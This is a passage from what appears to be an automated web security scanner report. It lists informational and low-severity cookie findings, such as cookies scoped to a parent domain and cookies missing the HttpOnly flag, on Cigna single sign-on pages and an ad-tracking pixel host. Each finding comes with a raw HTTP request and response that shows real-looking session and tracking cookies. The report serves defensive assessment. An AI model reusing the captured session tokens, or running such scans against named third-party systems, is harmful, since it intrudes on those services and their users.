User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

7.9. https://sso.corp.cigna.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=84D993307FD1107FC884A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:19 GMT
Content-length: 261
Content-type: text/html
Set-Cookie: TLTHID=8C93EE5E7FD1107FC96FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; Path=/; Domain=.cigna.com
Etag: "f2e32241-1-0-105"
Last-modified: Sun, 17 Jul 2005 20:01:07 GMT
Accept-ranges: bytes

<HTML>
<HEAD>
<META Http-Equiv="Cache-Control" Content="no-cache">
<META Http-Equiv="Pragma" Content="no-cache">
<META Http-Equiv="Expires" Content="0">
<META HTTP-EQUIV="Refresh" Content="0
...[SNIP]...

7.10. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/CIGNAforpros_logo1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/CIGNAforpros_logo1.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; JSESSIONID=0001mmeItkCv4WhFhPcFW-cezLI:13agknsul; TLTHID=92964B127FD1107FCAD3A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:31:39 GMT
Content-length: 4668
Content-type: image/gif
Set-Cookie: TLTHID=989F512A7FD1107FCBACA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "62a2347d-1-0-123c"
Last-modified: Mon, 19 Jan 2004 19:08:58 GMT
Accept-ranges: bytes

GIF89a..:.......D...........y.................c..9.......................n.................r..Y...........................z..........H..xxx.........,........W........d.................z...........<...
...[SNIP]...

7.11. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/arrow_orange.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/arrow_orange.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:24 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "ef1cee75-1-0-3d"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA16587FD9107F089BA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.12. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/cigna_logo.jpg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/cigna_logo.jpg HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:26 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "38eba70c-1-0-9ae"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA4F9C7FD9107F089FA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.13. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_ID.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/header_forgot_ID.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:32 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "7e42fb94-3-0-48c"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7E0907FD9107F0896A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.14. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/header_forgot_password.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /corp/sso/images/header_forgot_password.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=74B632B07FD1107FC7D4A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:42 GMT
Content-length: 1858
Content-type: image/gif
Set-Cookie: TLTHID=76094A447FD1107FC7EAA536181C0CE6; Path=/; Domain=.cigna.com
Etag: "50bef55a-8-0-742"
Last-modified: Sat, 10 Jan 2004 21:45:32 GMT
Accept-ranges: bytes

GIF89a..........k..7............q.............y...........Y..t..D..#y...............................................................................i.....D......n....c..........................Q......
...[SNIP]...

7.15. https://sso.corp.cigna.com/corp/sso/images/pshim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/pshim.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/pshim.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:38 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "4c740010-1-0-327"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4A7FF807FD9107F0898A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.16. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/truesecure.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/truesecure.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sun, 18 Jul 2010 14:12:02 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "8bbd1376-1-0-c0f"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA13387FD9107F089AA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.17. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/images/yahoo_logo.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/images/yahoo_logo.gif HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Sat, 10 Jan 2004 21:45:44 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
If-None-Match: "c45c439f-1-0-65"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to; TLTHID=67A13BF87FD9107F05A8A536181C0CE6; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:30:09 GMT
Set-Cookie: TLTHID=C4AA49AC7FD9107F089EA536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.18. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/includes/portal_styles.css

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/includes/portal_styles.css HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Referer: https://sso.corp.cigna.com/corp/sso/professional/controller
Cache-Control: max-age=0
If-Modified-Since: Wed, 21 Jan 2004 14:36:30 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
If-None-Match: "4ceaf758-1-0-a3d"
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=4D8EA84A7FD9107F04F9A536181C0CE6; JSESSIONID=0001oFQUAqUS6fNSwqlS-KnxaMM:13agkp3to

Response

HTTP/1.1 304 Use local copy
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 16:27:33 GMT
Set-Cookie: TLTHID=67A13BF87FD9107F05A8A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; Path=/; Domain=.cigna.com


7.19. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...

7.20. https://sso.corp.cigna.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sso.corp.cigna.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; JSESSIONID=0001pfBuk1XbIM4MuyOESCd0RLf:13agkp3to; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:46 GMT
Content-length: 318
Content-type: image/x-icon
Set-Cookie: TLTHID=78D4C8B67FD1107FC7FFA536181C0CE6; Path=/; Domain=.cigna.com

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...

7.21. http://va.px.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?key=segment&pixelID=57148&partner_uid=&partnerID=115 HTTP/1.1
Host: va.px.invitemedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFxfHnn3MAv82n3vHwsXM8S8cAHevCXM="; uid=2ecd6c1e-5306-444b-942d-9108b17fd086; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjY4XSwgIjQiOiBbIkNBRVNFTHhJVnRkbXQzZEthZnMzRlQ4dDRRMCIsIDczNDI3M119; subID="{}"; impressions="{\"591269\": [1305111613+ \"2904264903406918006\"+ 184+ 789+ 926]+ \"371390\": [1305550329+ \"TdEd9gAO8M4K5TsGkp5xaw==\"+ 64259+ 25503+ 517]+ \"591281\": [1305111351+ \"2727804715311744746\"+ 184+ 789+ 926]}"; camp_freq_p1=eJzjkuF4sZNZgFHi5+4j71gUGDV+3jv5jsWA0QLM5xLhePWZRYBJYu+NlUBZBg0GAwYLBgAi8hMl; io_freq_p1="eJzjEuZY4iTAKPFz95F3LAaMFmCaS5jjeKAAk8TeGyvfsSgwaDAYMFgwAAA8/Q25"; dp_rec="{\"2\": 1305550329}"

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 17:09:13 GMT
Set-Cookie: segments_p1="eJzjYuFo2czIxcIx5y0jFzPHv3AuLo49+5gFdq589Y4FAG34CUA=";Version=1;Path=/;Domain=invitemedia.com;Expires=Tue, 15-May-2012 17:09:13 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Cache-Control: no-cache
Location: http://ad.yieldmanager.com/pixel?id=1268516&t=2
Content-Length: 0
Connection: close
Server: Jetty(7.3.1.v20110307)


8. Cookie without HttpOnly flag set  previous  next
There are 163 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



8.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotId.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotId.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
content-language: en-US
content-type: text/html
date: Mon, 16 May 2011 15:31:34 GMT
location: https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/displayId.do
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 0
cache-control: no-cache,no-store,max-age=0
expires: Thu, 01 Jan 1970 00:00:00 GMT
pragma: No-cache
Set-Cookie: JSESSIONID=0000WJAfBu1bY2N8CqEkO0_cQjE:15eoj2vv7; Path=/
Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0


8.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /corp/sso/ci/selfsvc/forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/ci/selfsvc/forgotPassword.do?user.portal=provider HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 302 Found
